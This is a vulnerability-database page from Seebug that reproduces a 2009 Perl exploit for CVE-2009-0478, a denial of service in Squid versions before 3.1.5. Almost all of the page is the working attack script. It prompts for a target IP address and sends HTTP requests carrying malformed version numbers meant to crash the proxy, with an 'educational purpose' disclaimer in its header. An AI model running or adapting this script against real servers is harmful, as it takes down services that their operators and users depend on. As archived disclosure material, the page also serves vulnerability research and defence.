Lucene search

K
seebugRootSSV:66295
HistoryJul 01, 2014 - 12:00 a.m.

Squid < 3.1 5 - HTTP Version Number Parsing Denial of Service Exploit

2014-07-0100:00:00
Root
www.seebug.org
44

EPSS

0.951

Percentile

99.3%

No description provided by source.


                                                #!usr/bin/perl -w

########################################################################################
#
#    Reference:
#    http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0478
#     http://www.securityfocus.com/bid/33604/discuss
#
#$$$$$This was strictly written for educational purpose. Use it at your own risk.$$$$$
#$$$$$Author will not bare any responsibility for any damages watsoever.$$$$$$$$$$$$$$
#
#         Visit:        http://www.evilfingers.com/
#        Author:    Praveen Dar$hanam
#        Email:     praveen[underscore]recker[at]sify.com\
#        Blog:      http://www.darshanams.blogspot.com/
#        Date:      09th February, 2009
#
############Special thanx2 Joshua Morin, Mikko Varpiola, and Jukka Taimisto ############
########################################################################################
######Thanx to str0ke,milw0rm, @rp m@n,security folks and all INDIAN H@CKER$############
########################################################################################


use IO::Socket;

print(&#34;\nEnter IP Address of Vulnerable Server: \n&#34;);
$vuln_server_ip = &#60;STDIN&#62;;
chomp($vuln_server_ip);

@malicious_version=(&#34;9.9&#34;,&#34;%.%&#34;,&#34;%%&#34;,&#34;#.#&#34;,&#34;\$.\$&#34;,&#34;*.*&#34;,&#34;975.975&#34;,&#34;10000999&#34;);

foreach $mal (@malicious_version)
{
   $sock_http = IO::Socket::INET-&#62;new(  PeerAddr =&#62; $vuln_server_ip,
                                     PeerPort =&#62; 80,
                                     Proto    =&#62; &#39;tcp&#39;) || &#34;Unable to connect to HTTP Server&#34;;

   $http_attack = &#34;GET / HTTP/$mal\r\n&#34;.
   &#34;Host: $vuln_server_ip\r\n&#34;.
   &#34;Keep-Alive: 300\r\n&#34;.
   &#34;Connection: keep-alive\r\n\r\n&#34;;

   print $sock_http $http_attack;
   sleep(3);

   close($sock_http);
}

# milw0rm.com [2009-02-09]